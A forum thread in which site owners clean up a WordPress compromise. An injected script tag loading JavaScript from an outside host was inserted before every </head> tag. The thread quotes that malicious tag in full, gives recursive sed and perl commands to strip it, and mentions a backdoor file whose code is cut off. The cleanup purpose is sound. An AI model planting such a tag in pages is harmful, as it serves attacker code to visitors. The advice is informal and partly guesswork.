SSH Command to do mass search and replace
Hi everyone, new here :)
Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from <script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script> Is there a quick and easy way to do this through SSH Any help much appreciated ! |
let me get this straight that command is in a number of different files, or is in one file a number of times?
If it is a number of files, then sadly they each need to be touched. If it is in one file a bunch of times, then any editor, txt or otherwise, should be able to handle find/replace options for you. |
Quote:
Code:
sed -i.bak '/<whatever>/d' * Code:
for file in $(ls <file pattern>) |
Hi
Many thanks for help For reference after many hours puzzling over it, this worked fine find . -type f | xargs perl -pi -e 's/<script language=\"JavaScript" src=\"http:\/\/abtt.tv\/modules\/mod_servises\/ua.js\" type=\"text\/javascript\"><\/script>//g' I found the original source of the infection which was an outdated WP Plugin. That had allowed uploading of a file which scanned all other files and whereever it found a </head> tag, it inserted that line of JS before it Thanks |
You need the additional protection that RH puts on the apache web server... (SELinux mandatory access controls).
With it, you can label static files as read only, even to the apache server that may own the files... |
outdated WP plugin
Hi ryedaleblue,
Yesterday I found exactly the same javascript code that infected my sites. My server hosts some joomla installations and only one of WP. Can you please tell me what was exactly the outdated WP plugin that compromised your site? It seems this malicious url is quite new, can't find much info on that on internet, I found just your post. thank you in advance |
Hi Rizlo
Unfortunately, I've not been able to pinpoint it exactly. The infection occurred in a domain that has 15 Word press subdomains for mini sites The infection then spread through all sites looking for all </head> tags and inserting that line I downloaded all the filesand my anti virus picked up on a couple of hack files that had been uploaded but they weren't in a specific plugin folder I've seperated all the subdomains off into their own accounts on the server now to keep it isolated and updated all plugins on all of them If you run that code I've put above by using SSH and navigating to the root folder for your site , that should clear it out you may get some warning messages about it not being able to open certain files but it seems to clear through all text files ok Hope this helps |
Hey guys I have the exact same problem, infected all WP installations on my server by adding that same tag to my <head> before the closing tag. It seems to have wrote it four times about to each file now. Maybe we can get together and compare plugins to pinpoint which one it is or something to find an official solution? As the previous gentleman stated, it is a fairly new exploit and are no fixes that I've seen besides this one. Do I just login through my main domains Cpanel then go to SSH and paste this command?
Thanks in advance! |
Yep
I just navigated to public_html then ran that it worked fine for me but you may want to take a back up first! It seems to be spreading so I'd certainly be interested to find out what is getting expolited Thanks |
When my hosting company did a security audit on my hosting account, they said there was only one thing found malicious in a folder called toolbox...I've since deleted the folder which was a WP theme... but don't think that was the issue as it still seems to exist. I'm going to list a few current plugins that were installed by myself and a co worker recently (so maybe you guys can compare to your list of suspected plugins) and we can hunt the sucker down.
Only other ways I can think of hunting the issue down, is doxing the domain the file is hosted on (the .js) and comparing the information found to Wordpress plugin authors. Wish I knew a way of monitoring which files are writing code to others, that would solve the problem almost immediately, lol. |
I run ConfigScanner's expolit scan service on my server which is usually very quick at detecting hacks and quarantining them as soon as they are loaded into memory but it missed this one, probably because it's so new and maybe also because it doesn't seem to do anything other than insert that line (as far I've seen)
Yes I had the toolbox folder as well |
Odd, I deleted the toolbox folder, but it appears one file won't delete. Hrm.. any ideas on your end if this is the folder causing the issue? The file is wp-status.php - It won't let me delete, edit or even view the file..tried CHmodding it and everything..not sure what to do. Wonder if this is the cause of the issue?
|
Quote:
For that file, you might check to see if it is marked "immutable". If it is, you need to replace the entire system as the only way that could have been set is by root. And if it isn't RH based with SELinux enabled, you do have a problem. The RH based SELinux security models compartmentalize apache such that penetrations are confined to just files apache can write/update, with no access to system files or configuration files. |
That file that wouldn't let me remove it, I finally got my host to edit permissions on it so I was able to view/remove it. This is what the file code contained not sure if a PHP guru can decode it to see if this is actually the cause of the issue thats writing the script tag to each file containing the head? If not then the toolbox folder can't be the cause because that's the only file that remains in the directory now.
PHP Code: Code:
<?php |
After going through it I'm pretty confident in saying that this is the cause of the issue, and once it's removed and the shell command is run it should be fine.
|
All times are GMT -5. The time now is 03:51 AM. |